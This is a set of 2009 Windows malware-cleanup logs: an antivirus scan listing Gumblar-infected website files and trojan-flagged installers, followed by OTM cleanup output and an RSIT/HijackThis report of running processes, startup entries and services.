C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\thankyou.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\top.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\validation1.js Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\vmenu1.js Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\_holding.htm Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v3\archive\gallery.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v3\archive\swfobject.js Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v3\archive\validation1.js Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Documents and Settings\me\My Documents\Azureus Downloads\CorelDraw X4 inc Keygen0I\CorelDRAWGraphicsSuiteX4Installer_EN.exe Infected: Trojan-Downloader.Win32.Tiny.bxv 1
H:\backup\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Quarantine\09CC0002\4BCE6382.VBN Infected: Net-Worm.Win32.Kido.ih 1
H:\backup\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Quarantine\09CC0001\4BFDF086.VBN Infected: Trojan.Win32.Genome.dmy 1
H:\backup\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Quarantine\09CC0000\4BFDED76.VBN Infected: Trojan.Win32.Genome.dmy 1
H:\backup\Velocity Media\Website v3\archive\gallery.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v3\archive\swfobject.js Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v3\archive\validation1.js Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\about.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\bottom.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\contact.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\corpevents.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\creative.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\events.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\gallery.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\gallery2.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\marcom.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\marketing.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\menu.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\menu.js Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\pbrowser_dom.js Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\pbrowser_ie.js Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\pbrowser_iemac.js Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\pbrowser_opera.js Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\pbrowser_safari.js Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\portfolio.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\pr.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\services.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\swfobject.js Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\thankyou.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\top.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\validation1.js Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\vmenu1.js Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\_holding.htm Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Web Design\Vector Graphics\645 Vector Design Elements.exe Infected: Trojan-Downloader.Win32.AutoIt.is 1
H:\Data Sorting\Work\Quantum\MSNChecker.exe Infected: not-a-virus:NetTool.Win32.Sniffer.u 1
H:\Data Sorting\Work\Quantum\msnchecker1.1.exe Infected: not-a-virus:NetTool.Win32.Sniffer.u 1
H:\Downloads\Vector Softwares\CorelDraw X4 inc Keygen0I\CorelDRAWGraphicsSuiteX4Installer_EN.exe Infected: Trojan-Downloader.Win32.Tiny.bxv 1

The selected area was scanned.

OTM Log

All processes killed
========== REGISTRY ==========
Registry key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\H\ deleted successfully.
Registry key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{9d3c3908-9f8e-11dd-8976-001302e184fe}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9d3c3908-9f8e-11dd-8976-001302e184fe}\ not found.
Registry key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{b2b2c244-5aae-11de-89f0-001302e184fe}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b2b2c244-5aae-11de-89f0-001302e184fe}\ not found.
========== COMMANDS ==========

[EMPTYTEMP]

User: admin

User: Administrator
->Temp folder emptied: 0 bytes

User: All Users

User: Default User
->Temp folder emptied: 0 bytes

User: Guest
->Temporary Internet Files folder emptied: 0 bytes

User: LocalService
->Temp folder emptied: 0 bytes

User: me
File delete failed. C:\Documents and Settings\me\Local Settings\Temp\~DF97A9.tmp scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\me\Local Settings\Temp\~DFB41A.tmp scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\me\Local Settings\Temp\~DFBA59.tmp scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\me\Local Settings\Temp\~DFBBEA.tmp scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\me\Local Settings\Temp\~DFD930.tmp scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\me\Local Settings\Temp\~DFE17E.tmp scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\me\Local Settings\Temp\~DFEF12.tmp scheduled to be deleted on reboot.
->Temp folder emptied: 15605748 bytes
->Temporary Internet Files folder emptied: 5068720 bytes
->Java cache emptied: 13548123 bytes
->FireFox cache emptied: 0 bytes
->Google Chrome cache emptied: 61863113 bytes

User: NetworkService
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes

%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
Windows Temp folder emptied: 0 bytes
RecycleBin emptied: 0 bytes

Total Files Cleaned = 91.63 mb


OTM by OldTimer - Version 3.0.0.5 log created on 08052009_095943

Files moved on Reboot...
File C:\Documents and Settings\me\Local Settings\Temp\~DF97A9.tmp not found!
File C:\Documents and Settings\me\Local Settings\Temp\~DFB41A.tmp not found!
File C:\Documents and Settings\me\Local Settings\Temp\~DFBA59.tmp not found!
File C:\Documents and Settings\me\Local Settings\Temp\~DFBBEA.tmp not found!
File C:\Documents and Settings\me\Local Settings\Temp\~DFD930.tmp not found!
File C:\Documents and Settings\me\Local Settings\Temp\~DFE17E.tmp not found!
File C:\Documents and Settings\me\Local Settings\Temp\~DFEF12.tmp not found!

Registry entries deleted on Reboot...

RSIT Log

Logfile of random's system information tool 1.06 (written by random/random)
Run by me at 2009-08-06 20:17:08
Microsoft Windows XP Home Edition Service Pack 3
System drive C: has 10 GB (15%) free of 66 GB
Total RAM: 1526 MB (22% free)

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 8:17:33 PM, on 8/6/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Symantec\Symantec Endpoint Protection\Smc.exe
C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
C:\Program Files\Java\jre6\bin\jqs.exe
c:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Symantec\Symantec Endpoint Protection\Rtvscan.exe
C:\Program Files\Symantec\Symantec Endpoint Protection\SmcGui.exe
C:\WINDOWS\notepad.exe
C:\Program Files\hpq\HP Wireless Assistant\HP Wireless Assistant.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe
C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Google\Google Talk\googletalk.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
C:\Program Files\Common Files\Teleca Shared\Generic.exe
C:\PROGRA~1\Symbian\Shared\SYMBIA~1\SYMBIA~1.EXE
C:\PROGRA~1\WIDCOMM\BLUETO~1\BTSTAC~1.EXE
C:\PROGRA~1\Symbian\Shared\SYMBIA~1\SCBAL.exe
C:\WINDOWS\explorer.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Java\jre6\bin\java.exe
C:\Documents and Settings\me\Local Settings\Application Data\Google\Update\1.2.183.7\GoogleCrashHandler.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\WINDOWS\system32\notepad.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\WINDOWS\system32\NOTEPAD.EXE
C:\WINDOWS\system32\NOTEPAD.EXE
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\Program Files\Microsoft Office\Office12\EXCEL.EXE
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\Program Files\Microsoft Office\Office12\WINWORD.EXE
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Documents and Settings\me\Desktop\RSIT.exe
C:\Program Files\Trend Micro\HijackThis\me.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://ie.redirect.hp.com/svs/rdr?TYPE= ... &pf=laptop
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: RealPlayer Download and Record Plugin for Internet Explorer - {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\Program Files\Real\RealPlayer\rpbrowserrecordplugin.dll
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~1\MICROS~4\Office12\GRA8E1~1.DLL
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files\Google\Google Toolbar\GoogleToolbar.dll
O2 - BHO: AcroIEToolbarHelper Class - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll
O2 - BHO: Google Dictionary Compression sdch - {C84D72FE-E17D-4195-BB24-76C02E2E7C4E} - C:\Program Files\Google\Google Toolbar\Component\fastsearch_A8904FB862BD9564.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll
O3 - Toolbar: Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar.dll
O4 - HKLM\..\Run: [hpWirelessAssistant] C:\Program Files\hpq\HP Wireless Assistant\HP Wireless Assistant.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [QlbCtrl] %ProgramFiles%\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe /Start
O4 - HKLM\..\Run: [googletalk] C:\Program Files\Google\Google Talk\googletalk.exe /autostart
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKLM\..\Run: [MSConfig] C:\WINDOWS\pchealth\helpctr\Binaries\MSCONFIG.EXE /auto
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\Windows Live\Messenger\msnmsgr.exe" /background
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
O4 - Global Startup: Bluetooth.lnk = ?
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~4\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~4\Office12\ONBttnIE.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~4\Office12\REFIEBAR.DLL
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {4871A87A-BFDD-4106-8153-FFDE2BAC2967} (DLM Control) - http://dlm.tools.akamai.com/dlmanager/v ... .2.5.0.cab
O16 - DPF: {49232000-16E4-426C-A231-62846947304B} (SysData Class) - https://wimpro.cce.hp.com/ChatEntry/dow ... ysinfo.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/windows ... 4784755890
O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/Me ... b56907.cab
O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
O16 - DPF: {F9043C85-F6F2-101A-A3C9-08002B2F49FB} (Microsoft Common Dialog Control, version 6.0 (SP6)) - file:///C:/Program%20Files/OpenCube/NavStudio/program/comdlg32.cab
O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\PROGRA~1\MICROS~4\Office12\GR99D3~1.DLL
O18 - Filter: x-sdch - {B1759355-3EEC-4C1E-B0F1-B719FE26E377} - C:\Program Files\Google\Google Toolbar\Component\fastsearch_A8904FB862BD9564.dll
O20 - Winlogon Notify: !SASWinLogon - C:\Program Files\SUPERAntiSpyware\SASWINLO.dll
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
O23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe
O23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: LiveUpdate - Symantec Corporation - C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXE
O23 - Service: Protexis Licensing V2 (PSI_SVC_2) - Protexis Inc. - c:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe
O23 - Service: Symantec Management Client (SmcService) - Symantec Corporation - C:\Program Files\Symantec\Symantec Endpoint Protection\Smc.exe
O23 - Service: Symantec Endpoint Protection (Symantec AntiVirus) - Symantec Corporation - C:\Program Files\Symantec\Symantec Endpoint Protection\Rtvscan.exe

--
End of file - 11563 bytes

======Scheduled tasks folder======

C:\WINDOWS\tasks\AppleSoftwareUpdate.job
C:\WINDOWS\tasks\GoogleUpdateTaskUserS-1-5-21-721153600-2154975418-3561496284-1006Core.job
C:\WINDOWS\tasks\GoogleUpdateTaskUserS-1-5-21-721153600-2154975418-3561496284-1006UA.job

======Registry dump======

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}]
Adobe PDF Reader Link Helper - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll [2009-02-27 61816]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]
Adobe PDF Link Helper - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2009-02-27 75128]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3049C3E9-B461-4BC5-8870-4C09146192CA}]
RealPlayer Download and Record Plugin for Internet Explorer - C:\Program Files\Real\RealPlayer\rpbrowserrecordplugin.dll [2008-12-25 304736]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}]
Groove GFS Browser Helper - C:\PROGRA~1\MICROS~4\Office12\GRA8E1~1.DLL [2006-10-27 2210608]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9030D464-4C02-4ABF-8ECC-5164760863C6}]
Windows Live Sign-in Helper - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-01-22 408448]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AA58ED58-01DD-4d91-8333-CF10577473F7}]
Google Toolbar Helper - C:\Program Files\Google\Google Toolbar\GoogleToolbar.dll [2009-06-05 259696]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AE7CD045-E861-484f-8273-0445EE161910}]
AcroIEToolbarHelper Class - C:\Program Files\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll [2003-05-15 147456]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{C84D72FE-E17D-4195-BB24-76C02E2E7C4E}]
Google Dictionary Compression sdch - C:\Program Files\Google\Google Toolbar\Component\fastsearch_A8904FB862BD9564.dll [2009-06-05 470512]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
Java(tm) Plug-In 2 SSV Helper - C:\Program Files\Java\jre6\bin\jp2ssv.dll [2009-08-04 41368]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
JQSIEStartDetectorImpl Class - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll [2009-08-04 73728]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
{47833539-D0C5-4125-9FA8-0819E2EAAC93} - Adobe PDF - C:\Program Files\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll [2003-05-15 147456]
Locked
{2318C2B1-4965-11d4-9B18-009027A5CD4F} - Google Toolbar - C:\Program Files\Google\Google Toolbar\GoogleToolbar.dll [2009-06-05 259696]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"hpWirelessAssistant"=C:\Program Files\hpq\HP Wireless Assistant\HP Wireless Assistant.exe [2006-05-04 458752]
"SynTPEnh"=C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2006-06-17 794713]
"HP Software Update"=C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe [2005-02-16 49152]
"QlbCtrl"=C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe [2006-06-19 163840]
"googletalk"=C:\Program Files\Google\Google Talk\googletalk.exe [2007-01-02 3739648]
"ccApp"=C:\Program Files\Common Files\Symantec Shared\ccApp.exe [2009-03-17 115560]
"QuickTime Task"=C:\Program Files\QuickTime\qttask.exe [2009-05-26 413696]
"SunJavaUpdateSched"=C:\Program Files\Java\jre6\bin\jusched.exe [2009-08-04 148888]
"MSConfig"=C:\WINDOWS\pchealth\helpctr\Binaries\MSCONFIG.EXE [2008-04-14 169984]
"iTunesHelper"=C:\Program Files\iTunes\iTunesHelper.exe [2009-06-05 292136]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"msnmsgr"=C:\Program Files\Windows Live\Messenger\msnmsgr.exe [2009-02-06 3885408]
"swg"=C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [2008-11-20 68856]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe Reader Speed Launcher]
C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe [2009-02-27 35696]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ctfmon.exe]
C:\WINDOWS\system32\ctfmon.exe [2008-04-14 15360]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\mRouterConfig]
C:\Program Files\Intuwave\Shared\mRouterRuntime\mRouterConfig.exe [2006-03-02 290816]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\PC Suite for Smartphones]
C:\Program Files\Sony Ericsson\Mobile4\Application Launcher\Application Launcher.exe [2007-05-28 528384]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TkBellExe]
C:\Program Files\Common Files\Real\Update_OB\realsched.exe [2008-12-25 185872]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\services]
"LiveUpdate"=3
"Adobe LM Service"=3

C:\Documents and Settings\All Users\Start Menu\Programs\Startup
Bluetooth.lnk - C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\!SASWinLogon]
C:\Program Files\SUPERAntiSpyware\SASWINLO.dll [2008-12-22 356352]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\igfxcui]
C:\WINDOWS\system32\igfxdev.dll [2006-03-23 139264]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll [2006-10-18 133632]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{B5A7F190-DDA6-4420-B3BA-52453494E6CD}"=C:\PROGRA~1\MICROS~4\Office12\GRA8E1~1.DLL [2006-10-27 2210608]
"{5AE067D3-9AFB-48E0-853A-EBB7F4A000DA}"=C:\Program Files\SUPERAntiSpyware\SASSEH.DLL [2008-05-13 77824]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ccEvtMgr]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ccSetMgr]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Symantec Antivirus]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\ccEvtMgr]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\ccSetMgr]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\SmcService]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\Symantec Antivirus]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1

